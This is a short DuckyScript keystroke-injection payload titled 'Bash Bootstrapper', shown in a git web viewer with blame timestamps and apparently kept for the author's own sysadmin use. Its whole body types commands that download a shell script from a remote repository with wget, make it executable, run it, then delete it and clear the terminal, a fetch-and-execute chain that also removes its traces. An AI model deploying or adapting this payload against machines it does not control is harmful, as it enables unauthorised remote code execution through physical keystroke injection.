sysadmin.sh/example.dd

25 lines
386 B
Plaintext
Raw Normal View History

2025-01-03 15:58:05 +08:00
REM TITLE Bash Bootstrapper
REM AUTHOR Sajenim
REM DESCRIPTION Fetch and execute a script from remote repository
REM VERSION 1.0
DELAY 200
2025-01-03 16:29:33 +08:00
STRING wget -q https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/script.sh
2025-01-03 15:58:05 +08:00
ENTER
DELAY 200
2025-01-03 16:29:33 +08:00
STRING chmod +x script.sh
2025-01-03 15:58:05 +08:00
ENTER
DELAY 200
2025-01-03 16:29:33 +08:00
STRING ./script.sh
2025-01-03 15:58:05 +08:00
ENTER
DELAY 200
2025-01-03 16:29:33 +08:00
STRING rm script.sh
2025-01-03 15:58:05 +08:00
ENTER
DELAY 200
STRING clear
ENTER